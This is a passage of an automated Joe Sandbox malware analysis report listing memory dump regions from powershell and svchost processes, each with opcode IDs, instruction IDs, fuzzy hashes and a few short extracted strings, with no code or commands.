                                                      • Instruction Fuzzy Hash: 0A21F2A2A8DA674FE7A9FE28C75157466C6FF60310B7800F9D46EE7193CE24EC058241
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1927188448.00007FFB4AE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ae00000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6236964df6430785f4d1d1593387c07bd2b8213ce8c154bbeea212f684b65b34
                                                      • Instruction ID: b349251ff2f79087ce104bf837637714890672ae66e220d36f8bdf69a5baa549
                                                      • Opcode Fuzzy Hash: 6236964df6430785f4d1d1593387c07bd2b8213ce8c154bbeea212f684b65b34
                                                      • Instruction Fuzzy Hash: 171121B2A5E5294FE2A8FF28D6909B876D5FF40320B6810F9E06ED3197CA18AC008340
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction ID: b764d3461e64808fe044017503b5428d6c6fdd3860c4a6f5c4fe6a938b6e806c
                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction Fuzzy Hash: 9F01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3655DA36E892CB45
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fdbfad564c61e8e9c8d59dcfea6bafa120e371f25e4c56bc7fbbc81deb1d47c5
                                                      • Instruction ID: d1bac676dc2a7ba9595695f996f9c04a035f6a2174e6f69928c8d5e733f1cd89
                                                      • Opcode Fuzzy Hash: fdbfad564c61e8e9c8d59dcfea6bafa120e371f25e4c56bc7fbbc81deb1d47c5
                                                      • Instruction Fuzzy Hash: 31F0F6B7A0DA8C4FD745EF3CD8690E47FA0FF66201B5401EBD548C7161D6625808C7C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.1926441550.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_7ffb4ad30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                      • API String ID: 0-1415242001
                                                      • Opcode ID: b69e094581e222027f6376c6dde514a9bfe56ea2a0bcf9ad664e21dd0aba42ff
                                                      • Instruction ID: 177a9161b04b5c7b2c7a803da4e78c874df67be33f06441486a5689b2eaf49fe
                                                      • Opcode Fuzzy Hash: b69e094581e222027f6376c6dde514a9bfe56ea2a0bcf9ad664e21dd0aba42ff
                                                      • Instruction Fuzzy Hash: D82107B36046159AC2023A7DF8415ED7784DF5437834591F3EA18DF113DF24A89B8AA0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6676647c8494ee772a4fff75301386938fe7f035030fbc2fd63fd5415f89290
                                                      • Instruction ID: bee5c1b784ddf15c93aa287e4aba1b91ed5f0dc868abc8cc5c7af324f378b99e
                                                      • Opcode Fuzzy Hash: d6676647c8494ee772a4fff75301386938fe7f035030fbc2fd63fd5415f89290
                                                      • Instruction Fuzzy Hash: 5B22F6A1B1DA4A5FEB95FF38C4692B977D6EF88300F5405F9E40EC3286DE28AC418741
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 596c1b5bfc51de1366055785c33473040c66c3ad2bd603a93565e94e6b4c7df1
                                                      • Instruction ID: 121086224c062c4d1c1562032efc5d3759b30ff47c9e5ec1e7969b1fcfd44110
                                                      • Opcode Fuzzy Hash: 596c1b5bfc51de1366055785c33473040c66c3ad2bd603a93565e94e6b4c7df1
                                                      • Instruction Fuzzy Hash: 37510E90B1E6C90FD387BF789865276BFE8DF97219B1801FAE089CA193DD085846C346
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9M_^
                                                      • API String ID: 0-1708477388
                                                      • Opcode ID: 8d89ebd6c8c5f7bec434c5b625eb49ab0cc9ebbf0578e89dfb5d2e43c7ee3df0
                                                      • Instruction ID: 1bac0a1038ff6bbd1d442919f373e023e2204c5e593db1900044d0717051643e
                                                      • Opcode Fuzzy Hash: 8d89ebd6c8c5f7bec434c5b625eb49ab0cc9ebbf0578e89dfb5d2e43c7ee3df0
                                                      • Instruction Fuzzy Hash: FF6138A6B0E61EDAE742BF7CE4051EC77A5EF84325B1482F6D80DD7187CD24684687A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4M_^
                                                      • API String ID: 0-2545914641
                                                      • Opcode ID: 22c04f27f4d1498cf18a42ff9cfe3589d3a26d7edc57d40548e3cfa3cdd4f23d
                                                      • Instruction ID: b280ca4c0bd0abb16eadfda45b9f26fde28c87ee5b28d4075adc69de88d0fcc5
                                                      • Opcode Fuzzy Hash: 22c04f27f4d1498cf18a42ff9cfe3589d3a26d7edc57d40548e3cfa3cdd4f23d
                                                      • Instruction Fuzzy Hash: 40510561B0EA864FE397BB78D8551B97FE6DF86220B0941FBD489C7193DC1C9C428362
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 63e59481fc7bc0e800abae21588175506e0d74dfd33a636d1e38a4527f2ccd08
                                                      • Instruction ID: 6cf5749eff32f266934f484409b3722b01d094cb94dd410243d7263ace49db4b
                                                      • Opcode Fuzzy Hash: 63e59481fc7bc0e800abae21588175506e0d74dfd33a636d1e38a4527f2ccd08
                                                      • Instruction Fuzzy Hash: 5421FB67E0E79B8FE741BFBCD8620E97B74EF86220B0842F7D485DA193DD1858068350
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd2074eedcc943249f9863af86ab213817770b58723c8e67e3e879fbef3804a5
                                                      • Instruction ID: b0ec3044815eecbdabe87cb3b39e35abfed07debe326139c94c295ca36029bdc
                                                      • Opcode Fuzzy Hash: bd2074eedcc943249f9863af86ab213817770b58723c8e67e3e879fbef3804a5
                                                      • Instruction Fuzzy Hash: B6A13566B0A66ADAD701BF7CF8451EC7BA4EF85321B1482F7C849CA183CD246487C7E0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3548f1c88fd3b970e9d44526b5591ea5ca8e129a56523bf434490c7b3d837437
                                                      • Instruction ID: a375dad812d4104ca352c413363314671ec146ca8b109898f25a0223696f6375
                                                      • Opcode Fuzzy Hash: 3548f1c88fd3b970e9d44526b5591ea5ca8e129a56523bf434490c7b3d837437
                                                      • Instruction Fuzzy Hash: F3912266B0AA2EDAD701BF7CF8051E97BA4EF85335B1482F7D449CA187CD24648787E0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a377fb05b968ae31067c65060e1f0293e40fa90b3040b2e75a01dea07a9489e8
                                                      • Instruction ID: 810cf8f0a9245083c3f2b05a092a81aca5b0ab153e8f0daa45528f40eeabfd55
                                                      • Opcode Fuzzy Hash: a377fb05b968ae31067c65060e1f0293e40fa90b3040b2e75a01dea07a9489e8
                                                      • Instruction Fuzzy Hash: 03813566B0AA2EDAD701BF7CF4051E97BA4EF85321B1482F7D849CA187CD246487C7E0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1485a55a57479e7b54c0e83d477be2258fa8ce464914f6d725bd2ecfe21c07eb
                                                      • Instruction ID: 8de3bffee9e4306506f4ce07b43a48bf25ce9a2f729365d29f3ab4f9cf1b5330
                                                      • Opcode Fuzzy Hash: 1485a55a57479e7b54c0e83d477be2258fa8ce464914f6d725bd2ecfe21c07eb
                                                      • Instruction Fuzzy Hash: 61813566B0AA2EDAD701BF7CF4051E97BA4EF85321B1482F7D849CA187CD246447C7E0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 083c6c4c772c4eb911f99702caa932f31d8f1aeb8962628aaebbf26381931cc4
                                                      • Instruction ID: 74e6a0f1a349edbdbeddc2158772ca3c39658e79abf6c61aa38a3eff62130d50
                                                      • Opcode Fuzzy Hash: 083c6c4c772c4eb911f99702caa932f31d8f1aeb8962628aaebbf26381931cc4
                                                      • Instruction Fuzzy Hash: 62714566B0AA2EDAD701BF7CE4051EC7BA5EF85321B1482F6D849DB187CD246487C7E0
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd77a4103de4c59f6b99efa690701109344a78f9c695551220d4b0bc938b7e0a
                                                      • Instruction ID: 669668c044fc997f8f2de7fb14970484d29387a3e046c367f56f737a3c84d349
                                                      • Opcode Fuzzy Hash: cd77a4103de4c59f6b99efa690701109344a78f9c695551220d4b0bc938b7e0a
                                                      • Instruction Fuzzy Hash: CF31D361B1DA4C0FE789FB3C945A379A6D6EB98315F1402FEE44EC3293DD289C428345
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction ID: da63c2760dcf6d934bab0c861511e9abe13f28c5d98e1fed9a16499a9ad077f0
                                                      • Opcode Fuzzy Hash: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction Fuzzy Hash: 4231D391B19A099BE745BBBC981A3BD76D6EF98700F1402F6E40DD3582DD28AD018791
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcfe8f2e7d8c1635eab19bf9d6332a05f45702e3beedcc4427f8e9980c314fc5
                                                      • Instruction ID: 86512f8a3ec9d53fea69a0abb0390d43e16e3c0895e2b0616d38d89ce0f98755
                                                      • Opcode Fuzzy Hash: fcfe8f2e7d8c1635eab19bf9d6332a05f45702e3beedcc4427f8e9980c314fc5
                                                      • Instruction Fuzzy Hash: 0241DEA0A1DA0E8FEB45FF78D4692ACBBA2FF88301F6405B5D008D3286CE386945C750
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6366e26caf4e7ca915855d9b47bca92970e3e261310015474e7b827702606523
                                                      • Instruction ID: a48b1ccb7317c88cf00180c2c633700e707ff0df5cca85048b32bd119eaf40f5
                                                      • Opcode Fuzzy Hash: 6366e26caf4e7ca915855d9b47bca92970e3e261310015474e7b827702606523
                                                      • Instruction Fuzzy Hash: 6431C1A1A4AA4DAFD342FF3CD0B91A87FB1EF84200B8484E5D808C738BCE345941C761
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d0f355ec84b1c78a4c16b9d0b057952ac8d1e7fd8053cb77173471d747b480f
                                                      • Instruction ID: b80b4fe2c63792102bf3153efcb76e800d4e949bf00817f2183ef0ba89bd777d
                                                      • Opcode Fuzzy Hash: 2d0f355ec84b1c78a4c16b9d0b057952ac8d1e7fd8053cb77173471d747b480f
                                                      • Instruction Fuzzy Hash: AA21B1A1A4AA4DAFD352FF3CC0B91A97F71BFC8200B8484E5D808C738ACE745A41C761
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 937bbc79196270e2b79d4dba810e5744654ba698bd3960f41c71147de8c83839
                                                      • Instruction ID: c36ea4825a99ab4ab8c279f7c4e8cf0e175d796352502c7f5e7e2d6f86f76219
                                                      • Opcode Fuzzy Hash: 937bbc79196270e2b79d4dba810e5744654ba698bd3960f41c71147de8c83839
                                                      • Instruction Fuzzy Hash: 5B014995E0EBC50FE786BF389D654317FE0DFA1241B1804FAE8C8CA197DC08AA858342
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe605036c0c7bf7d99a32cc4794dc8f7c4aaf895c3ca9ed962c38bca4237abe8
                                                      • Instruction ID: 2e4287723d97932d71a5e24ded053291db1bf28973ce1c4d44f7dd3ee4396595
                                                      • Opcode Fuzzy Hash: fe605036c0c7bf7d99a32cc4794dc8f7c4aaf895c3ca9ed962c38bca4237abe8
                                                      • Instruction Fuzzy Hash: 7F22D5B0B2DA5A5FE795FF38C4692B97AD6EF98310F5404B9E40EC3287DD28AC418741
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9O_^
                                                      • API String ID: 0-1716625314
                                                      • Opcode ID: 5996996030ad07e816b455f668f4024007dcd5aa295d7b908b2abd153a9dd834
                                                      • Instruction ID: 224975c299106e412f71b910d57d88db3dda07b5c844e043fc6ba5bae05e504e
                                                      • Opcode Fuzzy Hash: 5996996030ad07e816b455f668f4024007dcd5aa295d7b908b2abd153a9dd834
                                                      • Instruction Fuzzy Hash: 4A6129B5B0D62ADAE741BF7CE0451FC3BA9EF84325B1481B6D80DD6187CD28688787B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4O_^
                                                      • API String ID: 0-2486912895
                                                      • Opcode ID: d4f60e89a7485702303978703ce0220b15acec08bcc11ad902aa77a18656780b
                                                      • Instruction ID: 11904205c8bbcca2116ffae55c91ec54927c6a8f6257b7c6448053286aa14157
                                                      • Opcode Fuzzy Hash: d4f60e89a7485702303978703ce0220b15acec08bcc11ad902aa77a18656780b
                                                      • Instruction Fuzzy Hash: 7E416BB1B1DA5A4FE396BA3CD4562B93BD6DF85221B0840FBE48DC7293DC189C438391
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <O_^
                                                      • API String ID: 0-1368354704
                                                      • Opcode ID: cc1c080c9b5fb599632556d93f0a4663a51711ba117e56b76617dfb013cfab7b
                                                      • Instruction ID: a175dd33a378b50bea5287f9cb867d4439b0a11f132658f87fc0bf29f3f1331b
                                                      • Opcode Fuzzy Hash: cc1c080c9b5fb599632556d93f0a4663a51711ba117e56b76617dfb013cfab7b
                                                      • Instruction Fuzzy Hash: 1E412675A0E759DFD382FF7CD0641E87BA8EF84214B5480F6D849CB29BCD285C868760
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3f8fed0f94dc21e6593baf557cd19c2dabf3d804511b816ee59995e25976f1e
                                                      • Instruction ID: 81d03ac4bc76385297009edd377bbd106019b23d244aab899adaa7af9d3fe105
                                                      • Opcode Fuzzy Hash: b3f8fed0f94dc21e6593baf557cd19c2dabf3d804511b816ee59995e25976f1e
                                                      • Instruction Fuzzy Hash: DAA1767AB0CA26DAD701BF7CE4452E87BA4EFC0335B1480B7C549CB187C924688B87E0
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43c5cdab61e8fe1d06da629b838b002a58584c51e4792879137e077dcba60deb
                                                      • Instruction ID: 855ce794f6b398d50bcaa1410c2388442976c273cb7a75e2004ae42455eff63e
                                                      • Opcode Fuzzy Hash: 43c5cdab61e8fe1d06da629b838b002a58584c51e4792879137e077dcba60deb
                                                      • Instruction Fuzzy Hash: 2691596AB08A26DAD701BF7DF4052E97BA4EFC4335B1485B7C549CB187C924688B87F0
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9abf86a7aa8bd48fb1744312b7d66f20c58001ed8732b42e3f7b67ecfb9f0fe
                                                      • Instruction ID: 962cbf0af255219a2654a64d6ed3f26dd34593614c8fd1a1ac80893767a63ea0
                                                      • Opcode Fuzzy Hash: b9abf86a7aa8bd48fb1744312b7d66f20c58001ed8732b42e3f7b67ecfb9f0fe
                                                      • Instruction Fuzzy Hash: 77817A7AB08A26DAD701BF7CF4052E97BA5EFC4335B1485B7C549CB187C924688B87E0
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ea5ee38c91275db689431f34df340a30beffc58a62fcfef4cdd1108f3bb83d0
                                                      • Instruction ID: aefdc0abc36bab4ee6d217be44f169ef76f54b2c5f1c0c0093d2e6dda998f6a7
                                                      • Opcode Fuzzy Hash: 9ea5ee38c91275db689431f34df340a30beffc58a62fcfef4cdd1108f3bb83d0
                                                      • Instruction Fuzzy Hash: 6F81587AB08A26DAD701BF7CF4052E97BA5EFC4335B1485B7C549CB187C924688B87E0
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b30fd4e749b72a696c2b3c9ce4d6ae322f8d916af71e6a57374b43bdf2155a98
                                                      • Instruction ID: 34251dc20e347ef7fd1b617ca8d0518f91c736bd5219edf8ec96ceabe5380841
                                                      • Opcode Fuzzy Hash: b30fd4e749b72a696c2b3c9ce4d6ae322f8d916af71e6a57374b43bdf2155a98
                                                      • Instruction Fuzzy Hash: BF717A7AB08A26DAD701BF7CE4052E97BA5EFC4335B1481B7C549DB187C924688BC7E0
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e71cc2d359b5d52731ba5c6d187c025cad34b289451aa7dcc4c9da4a8b96bd83
                                                      • Instruction ID: 8b5c70085d8ff55f94053e7cbe238636f386f32b5b41a2eac0960a51f31ea34d
                                                      • Opcode Fuzzy Hash: e71cc2d359b5d52731ba5c6d187c025cad34b289451aa7dcc4c9da4a8b96bd83
                                                      • Instruction Fuzzy Hash: 1522F4A0B1DA4D9FE799FF38C4592B976D6FF98308F5404B9E44ED3686CE28AC018741
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6982dc798adcef41cd2384cd6777455286518a57eca5cfb42efac854620c948d
                                                      • Instruction ID: 268223c3e5d79105d2bb9253331a504b4910da4c70e7dfd990ad898030b86c59
                                                      • Opcode Fuzzy Hash: 6982dc798adcef41cd2384cd6777455286518a57eca5cfb42efac854620c948d
                                                      • Instruction Fuzzy Hash: 0222E6A1B2DA4A9FEB95FF38C4592B977D6EF98300F5405F9E44EC3286DD28AC018741
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af340b4d7d9db7c56d62c8a27b9c90bb85cfbaaef7891c53b225f96a43f88ddf
                                                      • Instruction ID: c16575d6b3733645ddffad5edba979650b15bc391ba80cf68de56a0c6ab579a1
                                                      • Opcode Fuzzy Hash: af340b4d7d9db7c56d62c8a27b9c90bb85cfbaaef7891c53b225f96a43f88ddf
                                                      • Instruction Fuzzy Hash: AB510E90B1E6C94FD387BF788865276BFE8DF97219B1801FAE089CA193DD085846C346
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9M_^
                                                      • API String ID: 0-1708477388
                                                      • Opcode ID: 9f3b8989ddacf3e8f3dc579f1eb740c16590c61fbe3d1c0bac4dd9c1cb6802dd
                                                      • Instruction ID: 5be8052959548848d19103c4eceffcd153eca0b9ab3247f99a3fcac4b3c49200
                                                      • Opcode Fuzzy Hash: 9f3b8989ddacf3e8f3dc579f1eb740c16590c61fbe3d1c0bac4dd9c1cb6802dd
                                                      • Instruction Fuzzy Hash: AA6129A5B0E61ADAE741BF7CE4051EC77A5EF84324B1482F6D80DD7187CD28684787A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4M_^
                                                      • API String ID: 0-2545914641
                                                      • Opcode ID: b5abc885c199d08399ae794e2a93efc4e71a4d4825340561b4fe857367c3365c
                                                      • Instruction ID: 6599750f69af7786bd9b0254ba7cc549e06cf3fc407c22c3ce1947caa70c8454
                                                      • Opcode Fuzzy Hash: b5abc885c199d08399ae794e2a93efc4e71a4d4825340561b4fe857367c3365c
